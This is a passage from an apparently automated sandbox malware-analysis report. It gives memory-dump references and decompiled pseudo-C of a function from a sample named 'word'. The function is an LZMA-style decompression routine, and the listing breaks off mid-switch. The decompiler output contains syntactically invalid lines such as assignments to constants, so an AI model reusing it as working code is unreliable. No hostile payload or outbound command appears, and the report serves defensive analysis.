                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                      • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                      • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                      • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 98%
                                      			E00406BB0(void* __ecx) {
                                      				void* _v8;
                                      				void* _v12;
                                      				signed int _v16;
                                      				unsigned int _v20;
                                      				signed int _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				signed int _v36;
                                      				signed int _v40;
                                      				signed int _v44;
                                      				signed int _v48;
                                      				signed int _v52;
                                      				signed int _v56;
                                      				signed int _v60;
                                      				signed int _v64;
                                      				signed int _v68;
                                      				signed int _v72;
                                      				signed int _v76;
                                      				signed int _v80;
                                      				signed int _v84;
                                      				signed int _v88;
                                      				signed int _v92;
                                      				signed int _v95;
                                      				signed int _v96;
                                      				signed int _v100;
                                      				signed int _v104;
                                      				signed int _v108;
                                      				signed int _v112;
                                      				signed int _v116;
                                      				signed int _v120;
                                      				intOrPtr _v124;
                                      				signed int _v128;
                                      				signed int _v132;
                                      				signed int _v136;
                                      				void _v140;
                                      				void* _v148;
                                      				signed int _t537;
                                      				signed int _t538;
                                      				signed int _t572;
                                      
                                      				_t572 = 0x22;
                                      				_v148 = __ecx;
                                      				memcpy( &_v140, __ecx, _t572 << 2);
                                      				if(_v52 == 0xffffffff) {
                                      					return 1;
                                      				}
                                      				while(1) {
                                      					L3:
                                      					_t537 = _v140;
                                      					if(_t537 > 0x1c) {
                                      						break;
                                      					}
                                      					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                      						case 0:
                                      							__eflags = _v112;
                                      							if(_v112 == 0) {
                                      								goto L173;
                                      							}
                                      							_v112 = _v112 - 1;
                                      							_v116 = _v116 + 1;
                                      							_t537 =  *_v116;
                                      							__eflags = _t537 - 0xe1;
                                      							if(_t537 > 0xe1) {
                                      								goto L174;
                                      							}
                                      							_t542 = _t537 & 0x000000ff;
                                      							_push(0x2d);
                                      							asm("cdq");
                                      							_pop(_t576);
                                      							_push(9);
                                      							_pop(_t577);
                                      							_t622 = _t542 / _t576;
                                      							_t544 = _t542 % _t576 & 0x000000ff;
                                      							asm("cdq");
                                      							_t617 = _t544 % _t577 & 0x000000ff;
                                      							_v64 = _t617;
                                      							_v32 = (1 << _t622) - 1;
                                      							_v28 = (1 << _t544 / _t577) - 1;
                                      							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                      							__eflags = 0x600 - _v124;
                                      							if(0x600 == _v124) {
                                      								L12:
                                      								__eflags = _t625;
                                      								if(_t625 == 0) {
                                      									L14:
                                      									_v76 = _v76 & 0x00000000;
                                      									_v68 = _v68 & 0x00000000;
                                      									goto L17;
                                      								} else {
                                      									goto L13;
                                      								}
                                      								do {
                                      									L13:
                                      									_t625 = _t625 - 1;
                                      									__eflags = _t625;
                                      									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                      								} while (_t625 != 0);
                                      								goto L14;
                                      							}
                                      							__eflags = _v8;
                                      							if(_v8 != 0) {
                                      								GlobalFree(_v8);
                                      							}
                                      							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                      							__eflags = _t537;
                                      							_v8 = _t537;
                                      							if(_t537 == 0) {
                                      								goto L174;
                                      							} else {
                                      								_v124 = 0x600;
                                      								goto L12;
                                      							}
                                      						case 1:
                                      							L15:
                                      							__eflags = _v112;
                                      							if(_v112 == 0) {
                                      								_v140 = 1;
                                      								goto L173;
                                      							}
                                      							_v112 = _v112 - 1;
                                      							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                      							_v116 = _v116 + 1;
                                      							_t50 =  &_v76;
                                      							 *_t50 = _v76 + 1;
                                      							__eflags =  *_t50;
                                      							L17:
                                      							__eflags = _v76 - 4;
                                      							if(_v76 < 4) {
                                      								goto L15;
                                      							}
                                      							_t550 = _v68;
                                      							__eflags = _t550 - _v120;
                                      							if(_t550 == _v120) {
                                      								L22:
                                      								_v76 = 5;
                                      								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                      								goto L25;
                                      							}
                                      							__eflags = _v12;
                                      							_v120 = _t550;
                                      							if(_v12 != 0) {
                                      								GlobalFree(_v12);
                                      							}
                                      							_t537 = GlobalAlloc(0x40, _v68); // executed
                                      							__eflags = _t537;
                                      							_v12 = _t537;
                                      							if(_t537 == 0) {
                                      								goto L174;
                                      							} else {
                                      								goto L22;
                                      							}
                                      						case 2:
                                      							L26:
                                      							_t557 = _v100 & _v32;
                                      							_v136 = 6;
                                      							_v80 = _t557;
                                      							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                      							goto L135;
                                      						case 3:
                                      							L23:
                                      							__eflags = _v112;
                                      							if(_v112 == 0) {
                                      								_v140 = 3;
                                      								goto L173;
                                      							}
                                      							_v112 = _v112 - 1;
                                      							_t72 =  &_v116;
                                      							 *_t72 = _v116 + 1;
                                      							__eflags =  *_t72;
                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							L25:
                                      							_v76 = _v76 - 1;
                                      							__eflags = _v76;
                                      							if(_v76 != 0) {
                                      								goto L23;
                                      							}
                                      							goto L26;
                                      						case 4:
                                      							L136:
                                      							_t559 =  *_t626;
                                      							_t610 = _t559 & 0x0000ffff;
                                      							_t591 = (_v20 >> 0xb) * _t610;
                                      							__eflags = _v16 - _t591;
                                      							if(_v16 >= _t591) {
                                      								_v20 = _v20 - _t591;
                                      								_v16 = _v16 - _t591;
                                      								_v68 = 1;
                                      								_t560 = _t559 - (_t559 >> 5);
                                      								__eflags = _t560;
                                      								 *_t626 = _t560;
                                      							} else {
                                      								_v20 = _t591;
                                      								_v68 = _v68 & 0x00000000;
                                      								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                      							}
                                      							__eflags = _v20 - 0x1000000;
                                      							if(_v20 >= 0x1000000) {
                                      								goto L142;
                                      							} else {
                                      								goto L140;
                                      							}
                                      						case 5:
                                      							L140:
                                      							__eflags = _v112;
                                      							if(_v112 == 0) {
                                      								_v140 = 5;
                                      								goto L173;
                                      							}
                                      							_v20 = _v20 << 8;
                                      							_v112 = _v112 - 1;
                                      							_t464 =  &_v116;
                                      							 *_t464 = _v116 + 1;
                                      							__eflags =  *_t464;
                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							L142:
                                      							_t561 = _v136;
                                      							goto L143;
                                      						case 6:
                                      							__edx = 0;
                                      							__eflags = _v68;
                                      							if(_v68 != 0) {
                                      								__eax = _v8;
                                      								__ecx = _v60;
                                      								_v56 = 1;
                                      								_v136 = 7;
                                      								__esi = _v8 + 0x180 + _v60 * 2;
                                      								goto L135;
                                      							}
                                      							__eax = _v96 & 0x000000ff;
                                      							__esi = _v100;
                                      							__cl = 8;
                                      							__cl = 8 - _v64;
                                      							__esi = _v100 & _v28;
                                      							__eax = (_v96 & 0x000000ff) >> 8;
                                      							__ecx = _v64;
                                      							__esi = (_v100 & _v28) << 8;
                                      							__ecx = _v8;
                                      							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                      							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                      							__eflags = _v60 - 4;
                                      							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                      							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                      							if(_v60 >= 4) {
                                      								__eflags = _v60 - 0xa;
                                      								if(_v60 >= 0xa) {
                                      									_t103 =  &_v60;
                                      									 *_t103 = _v60 - 6;
                                      									__eflags =  *_t103;
                                      								} else {
                                      									_v60 = _v60 - 3;
                                      								}
                                      							} else {
                                      								_v60 = 0;
                                      							}
                                      							__eflags = _v56 - __edx;
                                      							if(_v56 == __edx) {
                                      								__ebx = 0;
                                      								__ebx = 1;
                                      								goto L63;
                                      							}
                                      							__eax = _v24;
                                      							__eax = _v24 - _v48;
                                      							__eflags = __eax - _v120;
                                      							if(__eax >= _v120) {
                                      								__eax = __eax + _v120;
                                      								__eflags = __eax;
                                      							}
                                      							__ecx = _v12;
                                      							__ebx = 0;
                                      							__ebx = 1;
                                      							__al =  *((intOrPtr*)(__eax + __ecx));
                                      							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                      							goto L43;
                                      						case 7:
                                      							__eflags = _v68 - 1;
                                      							if(_v68 != 1) {
                                      								__eax = _v40;
                                      								_v132 = 0x16;
                                      								_v36 = _v40;
                                      								__eax = _v44;
                                      								_v40 = _v44;
                                      								__eax = _v48;
                                      								_v44 = _v48;
                                      								__eax = 0;
                                      								__eflags = _v60 - 7;
                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      								__al = __al & 0x000000fd;
                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                      								_v60 = (__eflags >= 0) - 1 + 0xa;
                                      								__eax = _v8;
                                      								__eax = _v8 + 0x664;
                                      								__eflags = __eax;
                                      								_v92 = __eax;
                                      								goto L71;
                                      							}
                                      							__eax = _v8;
                                      							__ecx = _v60;
                                      							_v136 = 8;
                                      							__esi = _v8 + 0x198 + _v60 * 2;
                                      							goto L135;
                                      						case 8:
                                      							__eflags = _v68;
                                      							if(_v68 != 0) {
                                      								__eax = _v8;
                                      								__ecx = _v60;
                                      								_v136 = 0xa;
                                      								__esi = _v8 + 0x1b0 + _v60 * 2;
                                      							} else {
                                      								__eax = _v60;
                                      								__ecx = _v8;
                                      								__eax = _v60 + 0xf;
                                      								_v136 = 9;
                                      								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                      								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                      							}
                                      							goto L135;
                                      						case 9:
                                      							__eflags = _v68;
                                      							if(_v68 != 0) {
                                      								goto L92;
                                      							}
                                      							__eflags = _v100;
                                      							if(_v100 == 0) {
                                      								goto L174;
                                      							}
                                      							__eax = 0;
                                      							__eflags = _v60 - 7;
                                      							_t264 = _v60 - 7 >= 0;
                                      							__eflags = _t264;
                                      							0 | _t264 = _t264 + _t264 + 9;
                                      							_v60 = _t264 + _t264 + 9;
                                      							goto L78;
                                      						case 0xa:
                                      							__eflags = _v68;
                                      							if(_v68 != 0) {
                                      								__eax = _v8;
                                      								__ecx = _v60;
                                      								_v136 = 0xb;
                                      								__esi = _v8 + 0x1c8 + _v60 * 2;
                                      								goto L135;
                                      							}
                                      							__eax = _v44;
                                      							goto L91;
                                      						case 0xb:
                                      							__eflags = _v68;
                                      							if(_v68 != 0) {
                                      								__ecx = _v40;
                                      								__eax = _v36;
                                      								_v36 = _v40;
                                      							} else {
                                      								__eax = _v40;
                                      							}
                                      							__ecx = _v44;
                                      							_v40 = _v44;
                                      							L91:
                                      							__ecx = _v48;
                                      							_v48 = __eax;
                                      							_v44 = _v48;
                                      							L92:
                                      							__eax = _v8;
                                      							_v132 = 0x15;
                                      							__eax = _v8 + 0xa68;
                                      							_v92 = _v8 + 0xa68;
                                      							goto L71;
                                      						case 0xc:
                                      							L102:
                                      							__eflags = _v112;
                                      							if(_v112 == 0) {
                                      								_v140 = 0xc;
                                      								goto L173;
                                      							}
                                      							__ecx = _v116;
                                      							__eax = _v16;
                                      							_v20 = _v20 << 8;
                                      							__ecx =  *_v116 & 0x000000ff;
                                      							_v112 = _v112 - 1;
                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							_t340 =  &_v116;
                                      							 *_t340 = _v116 + 1;
                                      							__eflags =  *_t340;
                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							__eax = _v48;
                                      							goto L104;
                                      						case 0xd:
                                      							L39:
                                      							__eflags = _v112;
                                      							if(_v112 == 0) {
                                      								_v140 = 0xd;
                                      								goto L173;
                                      							}
                                      							__ecx = _v116;
                                      							__eax = _v16;
                                      							_v20 = _v20 << 8;
                                      							__ecx =  *_v116 & 0x000000ff;
                                      							_v112 = _v112 - 1;
                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							_t127 =  &_v116;
                                      							 *_t127 = _v116 + 1;
                                      							__eflags =  *_t127;
                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							L41:
                                      							__eax = _v68;
                                      							__eflags = _v76 - _v68;
                                      							if(_v76 != _v68) {
                                      								goto L50;
                                      							}
                                      							__eflags = __ebx - 0x100;
                                      							if(__ebx >= 0x100) {
                                      								goto L56;
                                      							}
                                      							L43:
                                      							__eax = _v95 & 0x000000ff;
                                      							_v95 = _v95 << 1;
                                      							__ecx = _v92;
                                      							__eax = (_v95 & 0x000000ff) >> 7;
                                      							_v76 = __eax;
                                      							__eax = __eax + 1;
                                      							__eax = __eax << 8;
                                      							__eax = __eax + __ebx;
                                      							__esi = _v92 + __eax * 2;
                                      							_v20 = _v20 >> 0xb;
                                      							__ax =  *__esi;
                                      							_v88 = __esi;
                                      							__edx = __ax & 0x0000ffff;
                                      							__ecx = (_v20 >> 0xb) * __edx;
                                      							__eflags = _v16 - __ecx;
                                      							if(_v16 >= __ecx) {
                                      								_v20 = _v20 - __ecx;
                                      								_v16 = _v16 - __ecx;
                                      								__cx = __ax;
                                      								_v68 = 1;
                                      								__cx = __ax >> 5;
                                      								__eflags = __eax;
                                      								__ebx = __ebx + __ebx + 1;
                                      								 *__esi = __ax;
                                      							} else {
                                      								_v68 = _v68 & 0x00000000;
                                      								_v20 = __ecx;
                                      								0x800 = 0x800 - __edx;
                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                      								__ebx = __ebx + __ebx;
                                      								 *__esi = __cx;
                                      							}
                                      							__eflags = _v20 - 0x1000000;
                                      							_v72 = __ebx;
                                      							if(_v20 >= 0x1000000) {
                                      								goto L41;
                                      							} else {
                                      								goto L39;
                                      							}
                                      						case 0xe:
                                      							L48:
                                      							__eflags = _v112;
                                      							if(_v112 == 0) {
                                      								_v140 = 0xe;
                                      								goto L173;
                                      							}
                                      							__ecx = _v116;
                                      							__eax = _v16;
                                      							_v20 = _v20 << 8;
                                      							__ecx =  *_v116 & 0x000000ff;
                                      							_v112 = _v112 - 1;
                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							_t161 =  &_v116;
                                      							 *_t161 = _v116 + 1;
                                      							__eflags =  *_t161;
                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							while(1) {
                                      								L50:
                                      								__eflags = __ebx - 0x100;
                                      								if(__ebx >= 0x100) {
                                      									break;
                                      								}
                                      								__eax = _v92;
                                      								__edx = __ebx + __ebx;
                                      								__ecx = _v20;
                                      								__esi = __edx + __eax;
                                      								__ecx = _v20 >> 0xb;
                                      								__ax =  *__esi;
                                      								_v88 = __esi;
                                      								__edi = __ax & 0x0000ffff;
                                      								__ecx = (_v20 >> 0xb) * __edi;
                                      								__eflags = _v16 - __ecx;
                                      								if(_v16 >= __ecx) {
                                      									_v20 = _v20 - __ecx;
                                      									_v16 = _v16 - __ecx;
                                      									__cx = __ax;
                                      									_t175 = __edx + 1; // 0x1
                                      									__ebx = _t175;
                                      									__cx = __ax >> 5;
                                      									__eflags = __eax;
                                      									 *__esi = __ax;
                                      								} else {
                                      									_v20 = __ecx;
                                      									0x800 = 0x800 - __edi;
                                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      									__ebx = __ebx + __ebx;
                                      									 *__esi = __cx;
                                      								}
                                      								__eflags = _v20 - 0x1000000;
                                      								_v72 = __ebx;
                                      								if(_v20 >= 0x1000000) {
                                      									continue;
                                      								} else {
                                      									goto L48;
                                      								}
                                      							}
                                      							L56:
                                      							_t178 =  &_v56;
                                      							 *_t178 = _v56 & 0x00000000;
                                      							__eflags =  *_t178;
                                      							goto L57;
                                      						case 0xf:
                                      							L60:
                                      							__eflags = _v112;
                                      							if(_v112 == 0) {
                                      								_v140 = 0xf;
                                      								goto L173;
                                      							}
                                      							__ecx = _v116;
                                      							__eax = _v16;
                                      							_v20 = _v20 << 8;
                                      							__ecx =  *_v116 & 0x000000ff;
                                      							_v112 = _v112 - 1;
                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							_t208 =  &_v116;
                                      							 *_t208 = _v116 + 1;
                                      							__eflags =  *_t208;
                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							L62:
                                      							__eflags = __ebx - 0x100;
                                      							if(__ebx >= 0x100) {
                                      								L57:
                                      								__al = _v72;
                                      								_v96 = _v72;
                                      								goto L58;
                                      							}
                                      							L63:
                                      							__eax = _v92;
                                      							__edx = __ebx + __ebx;
                                      							__ecx = _v20;
                                      							__esi = __edx + __eax;
                                      							__ecx = _v20 >> 0xb;
                                      							__ax =  *__esi;
                                      							_v88 = __esi;
                                      							__edi = __ax & 0x0000ffff;
                                      							__ecx = (_v20 >> 0xb) * __edi;
                                      							__eflags = _v16 - __ecx;
                                      							if(_v16 >= __ecx) {
                                      								_v20 = _v20 - __ecx;
                                      								_v16 = _v16 - __ecx;
                                      								__cx = __ax;
                                      								_t222 = __edx + 1; // 0x1
                                      								__ebx = _t222;
                                      								__cx = __ax >> 5;
                                      								__eflags = __eax;
                                      								 *__esi = __ax;
                                      							} else {
                                      								_v20 = __ecx;
                                      								0x800 = 0x800 - __edi;
                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      								__ebx = __ebx + __ebx;
                                      								 *__esi = __cx;
                                      							}
                                      							__eflags = _v20 - 0x1000000;
                                      							_v72 = __ebx;
                                      							if(_v20 >= 0x1000000) {
                                      								goto L62;
                                      							} else {
                                      								goto L60;
                                      							}
                                      						case 0x10:
                                      							L112:
                                      							__eflags = _v112;
                                      							if(_v112 == 0) {
                                      								_v140 = 0x10;
                                      								goto L173;
                                      							}
                                      							__ecx = _v116;
                                      							__eax = _v16;
                                      							_v20 = _v20 << 8;
                                      							__ecx =  *_v116 & 0x000000ff;
                                      							_v112 = _v112 - 1;
                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							_t371 =  &_v116;
                                      							 *_t371 = _v116 + 1;
                                      							__eflags =  *_t371;
                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							goto L114;
                                      						case 0x11:
                                      							L71:
                                      							__esi = _v92;
                                      							_v136 = 0x12;
                                      							goto L135;
                                      						case 0x12:
                                      							__eflags = _v68;
                                      							if(_v68 != 0) {
                                      								__eax = _v92;
                                      								_v136 = 0x13;
                                      								__esi = _v92 + 2;
                                      								L135:
                                      								_v88 = _t626;
                                      								goto L136;
                                      							}
                                      							__eax = _v80;
                                      							_v52 = _v52 & 0x00000000;
                                      							__ecx = _v92;
                                      							__eax = _v80 << 4;
                                      							__eflags = __eax;
                                      							__eax = _v92 + __eax + 4;
                                      							goto L133;
                                      						case 0x13:
                                      							__eflags = _v68;
                                      							if(_v68 != 0) {
                                      								_t475 =  &_v92;
                                      								 *_t475 = _v92 + 0x204;
                                      								__eflags =  *_t475;
                                      								_v52 = 0x10;
                                      								_v68 = 8;
                                      								L147:
                                      								_v128 = 0x14;
                                      								goto L148;
                                      							}
                                      							__eax = _v80;
                                      							__ecx = _v92;
                                      							__eax = _v80 << 4;
                                      							_v52 = 8;
                                      							__eax = _v92 + (_v80 << 4) + 0x104;
                                      							L133:
                                      							_v92 = __eax;
                                      							_v68 = 3;
                                      							goto L147;
                                      						case 0x14:
                                      							_v52 = _v52 + __ebx;
                                      							__eax = _v132;
                                      							goto L143;
                                      						case 0x15:
                                      							__eax = 0;
                                      							__eflags = _v60 - 7;
                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      							__al = __al & 0x000000fd;
                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                      							_v60 = (__eflags >= 0) - 1 + 0xb;
                                      							goto L123;
                                      						case 0x16:
                                      							__eax = _v52;
                                      							__eflags = __eax - 4;
                                      							if(__eax >= 4) {
                                      								_push(3);
                                      								_pop(__eax);
                                      							}
                                      							__ecx = _v8;
                                      							_v68 = 6;
                                      							__eax = __eax << 7;
                                      							_v128 = 0x19;
                                      							_v92 = __eax;
                                      							goto L148;
                                      						case 0x17:
                                      							L148:
                                      							__eax = _v68;
                                      							_v84 = 1;
                                      							_v76 = _v68;
                                      							goto L152;
                                      						case 0x18:
                                      							L149:
                                      							__eflags = _v112;
                                      							if(_v112 == 0) {
                                      								_v140 = 0x18;
                                      								goto L173;
                                      							}
                                      							__ecx = _v116;
                                      							__eax = _v16;
                                      							_v20 = _v20 << 8;
                                      							__ecx =  *_v116 & 0x000000ff;
                                      							_v112 = _v112 - 1;
                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							_t490 =  &_v116;
                                      							 *_t490 = _v116 + 1;
                                      							__eflags =  *_t490;
                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                      							L151:
                                      							_t493 =  &_v76;
                                      							 *_t493 = _v76 - 1;
                                      							__eflags =  *_t493;
                                      							L152:
                                      							__eflags = _v76;
                                      							if(_v76 <= 0) {
                                      								__ecx = _v68;
                                      								__ebx = _v84;
                                      								0 = 1;
                                      								__eax = 1 << __cl;
                                      								__ebx = _v84 - (1 << __cl);
                                      								__eax = _v128;
                                      								_v72 = __ebx;
                                      								L143:
                                      								_v140 = _t561;
                                      								goto L3;
                                      							}
                                      							__eax = _v84;
                                      							_v20 = _v20 >> 0xb;
                                      							__edx = _v84 + _v84;
                                      							__eax = _v92;
                                      							__esi = __edx + __eax;
                                      							_v88 = __esi;
                                      							__ax =  *__esi;
                                      							__edi = __ax & 0x0000ffff;
                                      							__ecx = (_v20 >> 0xb) * __edi;
                                      							__eflags = _v16 - __ecx;
                                      							if(_v16 >= __ecx) {
                                      								_v20 = _v20 - __ecx;
                                      								_v16 = _v16 - __ecx;
                                      								__cx = __ax;
                                      								__cx = __ax >> 5;
                                      								__eax = __eax - __ecx;
                                      								__edx = __edx + 1;
                                      								__eflags = __edx;
                                      								 *__esi = __ax;
                                      								_v84 = __edx;
                                      							} else {
                                      								_v20 = __ecx;
                                      								0x800 = 0x800 - __edi;
                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      								_v84 = _v84 << 1;
                                      								 *__esi = __cx;
                                      							}
                                      							__eflags = _v20 - 0x1000000;
                                      							if(_v20 >= 0x1000000) {
                                      								goto L151;
                                      							} else {
                                      								goto L149;
                                      							}
                                      						case 0x19:
                                      							__eflags = __ebx - 4;
                                      							if(__ebx < 4) {
                                      								_v48 = __ebx;
                                      								L122:
                                      								_t399 =  &_v48;
                                      								 *_t399 = _v48 + 1;
                                      								__eflags =  *_t399;
                                      								L123:
                                      								__eax = _v48;
                                      								__eflags = __eax;
                                      								if(__eax == 0) {
                                      									_v52 = _v52 | 0xffffffff;
                                      									goto L173;
                                      								}
                                      								__eflags = __eax - _v100;
                                      								if(__eax > _v100) {
                                      									goto L174;
                                      								}
                                      								_v52 = _v52 + 2;
                                      								__eax = _v52;
                                      								_t406 =  &_v100;
                                      								 *_t406 = _v100 + _v52;
                                      								__eflags =  *_t406;
                                      								goto L126;
                                      							}
                                      							__ecx = __ebx;
                                      							__eax = __ebx;
                                      							__ecx = __ebx >> 1;
                                      							__eax = __ebx & 0x00000001;
                                      							__ecx = (__ebx >> 1) - 1;
                                      							__al = __al | 0x00000002;
                                      							__eax = (__ebx & 0x00000001) << __cl;
                                      							__eflags = __ebx - 0xe;
                                      							_v48 = __eax;
                                      							if(__ebx >= 0xe) {
                                      								__ebx = 0;
                                      								_v76 = __ecx;
                                      								L105:
                                      								__eflags = _v76;
                                      								if(_v76 <= 0) {
                                      									__eax = __eax + __ebx;
                                      									_v68 = 4;
                                      									_v48 = __eax;
                                      									__eax = _v8;
                                      									__eax = _v8 + 0x644;
                                      									__eflags = __eax;
                                      									L111:
                                      									__ebx = 0;
                                      									_v92 = __eax;
                                      									_v84 = 1;
                                      									_v72 = 0;
                                      									_v76 = 0;
                                      									L115:
                                      									__eax = _v68;
                                      									__eflags = _v76 - _v68;
                                      									if(_v76 >= _v68) {
                                      										_t397 =  &_v48;
                                      										 *_t397 = _v48 + __ebx;
                                      										__eflags =  *_t397;
                                      										goto L122;
                                      									}
                                      									__eax = _v84;
                                      									_v20 = _v20 >> 0xb;
                                      									__edi = _v84 + _v84;
                                      									__eax = _v92;
                                      									__esi = __edi + __eax;
                                      									_v88 = __esi;
                                      									__ax =  *__esi;
                                      									__ecx = __ax & 0x0000ffff;
                                      									__edx = (_v20 >> 0xb) * __ecx;
                                      									__eflags = _v16 - __edx;
                                      									if(_v16 >= __edx) {
                                      										__ecx = 0;
                                      										_v20 = _v20 - __edx;
                                      										__ecx = 1;
                                      										_v16 = _v16 - __edx;
                                      										__ebx = 1;
                                      										__ecx = _v76;
                                      										__ebx = 1 << __cl;
                                      										__ecx = 1 << __cl;
                                      										__ebx = _v72;
                                      										__ebx = _v72 | __ecx;
                                      										__cx = __ax;
                                      										__cx = __ax >> 5;
                                      										__eax = __eax - __ecx;
                                      										__edi = __edi + 1;
                                      										__eflags = __edi;
                                      										_v72 = __ebx;
                                      										 *__esi = __ax;
                                      										_v84 = __edi;
                                      									} else {
                                      										_v20 = __edx;
                                      										0x800 = 0x800 - __ecx;
                                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                      										_v84 = _v84 << 1;
                                      										 *__esi = __dx;
                                      									}
                                      									__eflags = _v20 - 0x1000000;
                                      									if(_v20 >= 0x1000000) {
                                      										L114:
                                      										_t374 =  &_v76;
                                      										 *_t374 = _v76 + 1;
                                      										__eflags =  *_t374;
                                      										goto L115;
                                      									} else {
                                      										goto L112;
                                      									}
                                      								}
                                      								__ecx = _v16;
                                      								__ebx = __ebx + __ebx;
                                      								_v20 = _v20 >> 1;
                                      								__eflags = _v16 - _v20;
                                      								_v72 = __ebx;
                                      								if(_v16 >= _v20) {
                                      									__ecx = _v20;
                                      									_v16 = _v16 - _v20;
                                      									__ebx = __ebx | 0x00000001;
                                      									__eflags = __ebx;
                                      									_v72 = __ebx;
                                      								}
                                      								__eflags = _v20 - 0x1000000;
                                      								if(_v20 >= 0x1000000) {
                                      									L104:
                                      									_t344 =  &_v76;
                                      									 *_t344 = _v76 - 1;
                                      									__eflags =  *_t344;
                                      									goto L105;
                                      								} else {
                                      									goto L102;
                                      								}
                                      							}
                                      							__edx = _v8;
                                      							__eax = __eax - __ebx;
                                      							_v68 = __ecx;
                                      							__eax = _v8 + 0x55e + __eax * 2;
                                      							goto L111;
                                      						case 0x1a:
                                      							L58:
                                      							__eflags = _v104;
                                      							if(_v104 == 0) {
                                      								_v140 = 0x1a;
                                      								goto L173;
                                      							}
                                      							__ecx = _v108;
                                      							__al = _v96;
                                      							__edx = _v12;
                                      							_v100 = _v100 + 1;
                                      							_v108 = _v108 + 1;
                                      							_v104 = _v104 - 1;
                                      							 *_v108 = __al;
                                      							__ecx = _v24;
                                      							 *(_v12 + __ecx) = __al;
                                      							__eax = __ecx + 1;
                                      							__edx = 0;
                                      							_t197 = __eax % _v120;
                                      							__eax = __eax / _v120;
                                      							__edx = _t197;
                                      							goto L82;
                                      						case 0x1b:
                                      							L78:
                                      							__eflags = _v104;
                                      							if(_v104 == 0) {
                                      								_v140 = 0x1b;
                                      								goto L173;
                                      							}
                                      							__eax = _v24;
                                      							__eax = _v24 - _v48;
                                      							__eflags = __eax - _v120;
                                      							if(__eax >= _v120) {
                                      								__eax = __eax + _v120;
                                      								__eflags = __eax;
                                      							}
                                      							__edx = _v12;
                                      							__cl =  *(__edx + __eax);
                                      							__eax = _v24;
                                      							_v96 = __cl;
                                      							 *(__edx + __eax) = __cl;
                                      							__eax = __eax + 1;
                                      							__edx = 0;
                                      							_t280 = __eax % _v120;
                                      							__eax = __eax / _v120;
                                      							__edx = _t280;
                                      							__eax = _v108;
                                      							_v100 = _v100 + 1;
                                      							_v108 = _v108 + 1;
                                      							_t289 =  &_v104;
                                      							 *_t289 = _v104 - 1;
                                      							__eflags =  *_t289;
                                      							 *_v108 = __cl;
                                      							L82:
                                      							_v24 = __edx;
                                      							goto L83;
                                      						case 0x1c:
